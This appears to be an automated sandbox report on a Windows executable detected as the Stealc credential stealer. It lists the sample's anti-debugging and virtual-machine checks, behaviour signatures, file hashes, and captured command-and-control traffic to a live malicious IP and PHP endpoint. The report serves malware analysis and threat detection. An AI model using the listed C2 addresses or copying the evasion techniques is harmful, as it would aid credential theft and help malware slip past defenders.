                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008BE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008BED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008C4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008C3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008BF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008B16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008BDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008BBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008B1160 GetSystemInfo,ExitProcess
                Source: file.exe, file.exe, 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.1528463246.0000000000815000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1528463246.00000000007E2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.1528463246.000000000079E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13642
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13639
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13654
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13694
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13659
                Source: C:\Users\user\Desktop\file.exe | System information queried: ModuleInformation
                Source: C:\Users\user\Desktop\file.exe | Process information queried: ProcessInformation

                Anti Debugging

                Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
                Source: C:\Users\user\Desktop\file.exe | File opened: SICE
                Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
                Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008B45C0 VirtualProtect ?,00000004,00000100,00000000
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008C9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008C9750 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008C78E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA
                Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exe | Memory protected: page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: Yara match | File source: Process Memory Space: file.exe PID: 5492, type: MEMORYSTR
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008C9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle
                Source: file.exe, file.exe, 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: zProgram Manager
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008C7B90 GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree
                Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008C7980 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008C7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008C7A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA

                Stealing of Sensitive Information

                Source: Yara match | File source: 0.2.file.exe.8b0000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000000.00000002.1528463246.000000000079E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000003.1484136381.0000000004BE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: file.exe PID: 5492, type: MEMORYSTR
                Source: Yara match | File source: dump.pcap, type: PCAP

                Remote Access Functionality

                Source: Yara match | File source: 0.2.file.exe.8b0000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000000.00000002.1528463246.000000000079E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000003.1484136381.0000000004BE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: file.exe PID: 5492, type: MEMORYSTR
                Source: Yara match | File source: dump.pcap, type: PCAP
                MITRE ATT&CK Matrix (techniques listed per tactic; a leading number is the report's count of matching signatures for that technique)

                Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
                Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
                Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
                Execution: 2 Command and Scripting Interpreter; 11 Native API; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
                Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
                Privilege Escalation: 11 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
                Defense Evasion: 1 Masquerading; 33 Virtualization/Sandbox Evasion; 11 Disable or Modify Tools; 11 Process Injection; 1 Deobfuscate/Decode Files or Information; 3 Obfuscated Files or Information; 12 Software Packing; 1 DLL Side-Loading
                Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
                Discovery: 2 System Time Discovery; 641 Security Software Discovery; 33 Virtualization/Sandbox Evasion; 13 Process Discovery; 1 Account Discovery; 1 System Owner/User Discovery; 1 File and Directory Discovery; 324 System Information Discovery
                Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
                Collection: 1 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
                Command and Control: 2 Encrypted Channel; 2 Ingress Tool Transfer; 2 Non-Application Layer Protocol; 12 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
                Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
                Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
Source | Detection | Scanner | Label
file.exe | 45% | ReversingLabs | Win32.Trojan.Generic
file.exe | 100% | Avira | TR/Crypt.TPM.Gen
file.exe | 100% | Joe Sandbox ML |
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
Source | Detection | Scanner | Label
http://185.215.113.37/ | 100% | URL Reputation | malware
http://185.215.113.37 | 100% | URL Reputation | malware
http://185.215.113.37/e2b1563c6670f193.php | 100% | URL Reputation | malware
http://185.215.113.37/ws | 100% | URL Reputation | malware
                No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
http://185.215.113.37/ | true | URL Reputation: malware | unknown
http://185.215.113.37/e2b1563c6670f193.php | true | URL Reputation: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://185.215.113.37N | file.exe, 00000000.00000002.1528463246.000000000079E000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37 | file.exe, 00000000.00000002.1528463246.000000000079E000.00000004.00000020.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
http://185.215.113.37/e2b1563c6670f193.phpjZr | file.exe, 00000000.00000002.1528463246.0000000000815000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37/e2b1563c6670f193.php4 | file.exe, 00000000.00000002.1528463246.00000000007E2000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37/e2b1563c6670f193.phpt | file.exe, 00000000.00000002.1528463246.00000000007E2000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37/ws | file.exe, 00000000.00000002.1528463246.00000000007FB000.00000004.00000020.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
http://185.215.113.37/e2b1563c6670f193.phpz | file.exe, 00000000.00000002.1528463246.00000000007FB000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37/e2b1563c6670f193.phpH | file.exe, 00000000.00000002.1528463246.00000000007E2000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37/e2b1563c6670f193.php7 | file.exe, 00000000.00000002.1528463246.00000000007FB000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
185.215.113.37 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1539396
Start date and time: 2024-10-22 16:10:45 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 4m 19s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 6
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: file.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@1/0@0/1
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 80%
• Number of executed functions: 19
• Number of non-executed functions: 84
Cookbook Comments:
• Found application associated with file extension: .exe
• Stop behavior analysis, all processes terminated
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
• Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
• VT rate limit hit for: file.exe
                              No simulations
Match | Associated Sample Name / URL | Detection | Threat Name | Context
185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | LummaC, Stealc | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | LummaC, Stealc | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                              No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | LummaC, Stealc | 185.215.113.16
WHOLESALECONNECTIONSNL | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.215.113.16
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.215.113.16
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | LummaC, Stealc | 185.215.113.16
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
                              No context
                              No context
                              No created / dropped files found
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.94664445453577
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: file.exe
File size: 1'821'696 bytes
MD5: e146f5225dc59d28304d4ea38a3c1265
SHA1: f8b22e7a65737087d98f2991180ce701b4140db3
SHA256: 6220e540efb2808a44871e88bc3624ad976feb663c6c445e71e6da8be8695f2a
SHA512: f787954eec1c61f2b80a92439ba9128f65169173c9e9305378be2f2aa9c31d0e214cc068c378ad7848fee0bc751f526659b05cb60bb0d33eae12cf73ebaca6df
SSDEEP: 24576:ceu9yHUfKCXdz0/9NmUvfie22dCUTpnuaOj3kRiAIsnfPXMMycrRmtMjtMqgKyLK:Z8ym1Xdcme22dCuDa2Iarj1RK1S9WZA
TLSH: 0085337C7C98C9CCC508C2FDD6BB64EAFA3453296489E54AC71986708F4E7709B871B2
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........
Icon Hash: 00928e8e8686b000
Entrypoint: 0xa8b000
Entrypoint Section: .taggant
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 1
File Version Major: 5
File Version Minor: 1
Subsystem Version Major: 5
Subsystem Version Minor: 1
Import Hash: 2eabe9054cad5152567f0699947a2c5b
                              Programming Language:
                              • [C++] VS2010 build 30319
                              • [ASM] VS2010 build 30319
                              • [ C ] VS2010 build 30319
                              • [ C ] VS2008 SP1 build 30729
                              • [IMP] VS2008 SP1 build 30729
                              • [LNK] VS2010 build 30319
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x25d050 | 0x64 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x25d1f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
 | 0x1000 | 0x25b000 | 0x22800 | 009135d5f0b8d2afaa7ba0abadca92c8 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x25c000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x25d000 | 0x1000 | 0x200 | c60c4959cc8d384ac402730cc6842bb0 | False | 0.1328125 | data | 0.9064079259880791 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
 | 0x25e000 | 0x295000 | 0x200 | 11001e1352b7b4014ffb904b255ce275 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
pqeyqbvq | 0x4f3000 | 0x197000 | 0x196a00 | 664c0da78950dd576bb5325fa01c779c | False | 0.9948731219259146 | data | 7.953729049995973 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
oscgfsnm | 0x68a000 | 0x1000 | 0x400 | a01519cdb97f657281757a8dd3596dbb | False | 0.802734375 | data | 6.280815137065525 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x68b000 | 0x3000 | 0x2200 | c1de790a69f4949445f3d725b4ceac12 | False | 0.05905330882352941 | DOS executable (COM) | 0.7328553963503524 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
DLL | Import
kernel32.dll | lstrcpy
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-22T16:11:56.055353+0200 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.9 | 49706 | 185.215.113.37 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 22, 2024 16:11:54.764913082 CEST | 49706 | 80 | 192.168.2.9 | 185.215.113.37
Oct 22, 2024 16:11:54.770281076 CEST | 80 | 49706 | 185.215.113.37 | 192.168.2.9
Oct 22, 2024 16:11:54.770347118 CEST | 49706 | 80 | 192.168.2.9 | 185.215.113.37
Oct 22, 2024 16:11:54.770510912 CEST | 49706 | 80 | 192.168.2.9 | 185.215.113.37
Oct 22, 2024 16:11:54.775973082 CEST | 80 | 49706 | 185.215.113.37 | 192.168.2.9
Oct 22, 2024 16:11:55.719485998 CEST | 80 | 49706 | 185.215.113.37 | 192.168.2.9
Oct 22, 2024 16:11:55.719625950 CEST | 49706 | 80 | 192.168.2.9 | 185.215.113.37
Oct 22, 2024 16:11:55.764700890 CEST | 49706 | 80 | 192.168.2.9 | 185.215.113.37
Oct 22, 2024 16:11:55.770507097 CEST | 80 | 49706 | 185.215.113.37 | 192.168.2.9
Oct 22, 2024 16:11:56.055305004 CEST | 80 | 49706 | 185.215.113.37 | 192.168.2.9
Oct 22, 2024 16:11:56.055352926 CEST | 49706 | 80 | 192.168.2.9 | 185.215.113.37
Oct 22, 2024 16:11:59.510843992 CEST | 49706 | 80 | 192.168.2.9 | 185.215.113.37
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.9 | 49706 | 185.215.113.37 | 80 | 5492 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
Oct 22, 2024 16:11:54.770510912 CEST | 89 | OUT | GET / HTTP/1.1
                              Host: 185.215.113.37
                              Connection: Keep-Alive
                              Cache-Control: no-cache
Oct 22, 2024 16:11:55.719485998 CEST | 203 | IN | HTTP/1.1 200 OK
                              Date: Tue, 22 Oct 2024 14:11:55 GMT
                              Server: Apache/2.4.52 (Ubuntu)
                              Content-Length: 0
                              Keep-Alive: timeout=5, max=100
                              Connection: Keep-Alive
                              Content-Type: text/html; charset=UTF-8
Oct 22, 2024 16:11:55.764700890 CEST | 412 | OUT | POST /e2b1563c6670f193.php HTTP/1.1
                              Content-Type: multipart/form-data; boundary=----CGCFIIEBKEGHJJJJJJDA
                              Host: 185.215.113.37
                              Content-Length: 211
                              Connection: Keep-Alive
                              Cache-Control: no-cache
                              Data Raw: 2d 2d 2d 2d 2d 2d 43 47 43 46 49 49 45 42 4b 45 47 48 4a 4a 4a 4a 4a 4a 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 34 45 38 30 34 42 35 46 44 37 36 32 37 37 38 39 30 34 39 32 36 0d 0a 2d 2d 2d 2d 2d 2d 43 47 43 46 49 49 45 42 4b 45 47 48 4a 4a 4a 4a 4a 4a 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 43 47 43 46 49 49 45 42 4b 45 47 48 4a 4a 4a 4a 4a 4a 44 41 2d 2d 0d 0a
                              Data Ascii: ------CGCFIIEBKEGHJJJJJJDAContent-Disposition: form-data; name="hwid"74E804B5FD762778904926------CGCFIIEBKEGHJJJJJJDAContent-Disposition: form-data; name="build"doma------CGCFIIEBKEGHJJJJJJDA--
Oct 22, 2024 16:11:56.055305004 CEST | 210 | IN | HTTP/1.1 200 OK
                              Date: Tue, 22 Oct 2024 14:11:55 GMT
                              Server: Apache/2.4.52 (Ubuntu)
                              Content-Length: 8
                              Keep-Alive: timeout=5, max=99
                              Connection: Keep-Alive
                              Content-Type: text/html; charset=UTF-8
                              Data Raw: 59 6d 78 76 59 32 73 3d
                              Data Ascii: YmxvY2s=
Target ID: 0
Start time: 10:11:50
Start date: 22/10/2024
Path: C:\Users\user\Desktop\file.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\file.exe"
Imagebase: 0x8b0000
File size: 1'821'696 bytes
MD5 hash: E146F5225DC59D28304D4EA38A3C1265
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1528463246.000000000079E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1484136381.0000000004BE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation: low
Has exited: true


                                Execution Graph

Execution Coverage: 8.1%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 10.1%
Total number of Nodes: 2000
Total number of Limit Nodes: 24
13937 8c6443 13936->13937 13938 8ca8a0 lstrcpy 13937->13938 13939 8c6455 13938->13939 13940 8ca8a0 lstrcpy 13939->13940 13941 8c6467 13940->13941 13942 8ca8a0 lstrcpy 13941->13942 13943 8c5b86 13942->13943 13943->13707 13945 8b45c0 2 API calls 13944->13945 13946 8b26b4 13945->13946 13947 8b45c0 2 API calls 13946->13947 13948 8b26d7 13947->13948 13949 8b45c0 2 API calls 13948->13949 13950 8b26f0 13949->13950 13951 8b45c0 2 API calls 13950->13951 13952 8b2709 13951->13952 13953 8b45c0 2 API calls 13952->13953 13954 8b2736 13953->13954 13955 8b45c0 2 API calls 13954->13955 13956 8b274f 13955->13956 13957 8b45c0 2 API calls 13956->13957 13958 8b2768 13957->13958 13959 8b45c0 2 API calls 13958->13959 13960 8b2795 13959->13960 13961 8b45c0 2 API calls 13960->13961 13962 8b27ae 13961->13962 13963 8b45c0 2 API calls 13962->13963 13964 8b27c7 13963->13964 13965 8b45c0 2 API calls 13964->13965 13966 8b27e0 13965->13966 13967 8b45c0 2 API calls 13966->13967 13968 8b27f9 13967->13968 13969 8b45c0 2 API calls 13968->13969 13970 8b2812 13969->13970 13971 8b45c0 2 API calls 13970->13971 13972 8b282b 13971->13972 13973 8b45c0 2 API calls 13972->13973 13974 8b2844 13973->13974 13975 8b45c0 2 API calls 13974->13975 13976 8b285d 13975->13976 13977 8b45c0 2 API calls 13976->13977 13978 8b2876 13977->13978 13979 8b45c0 2 API calls 13978->13979 13980 8b288f 13979->13980 13981 8b45c0 2 API calls 13980->13981 13982 8b28a8 13981->13982 13983 8b45c0 2 API calls 13982->13983 13984 8b28c1 13983->13984 13985 8b45c0 2 API calls 13984->13985 13986 8b28da 13985->13986 13987 8b45c0 2 API calls 13986->13987 13988 8b28f3 13987->13988 13989 8b45c0 2 API calls 13988->13989 13990 8b290c 13989->13990 13991 8b45c0 2 API calls 13990->13991 13992 8b2925 13991->13992 13993 8b45c0 2 API calls 13992->13993 13994 8b293e 13993->13994 13995 8b45c0 2 API calls 13994->13995 13996 8b2957 13995->13996 13997 8b45c0 2 API calls 13996->13997 13998 8b2970 13997->13998 13999 8b45c0 2 API calls 13998->13999 14000 8b2989 
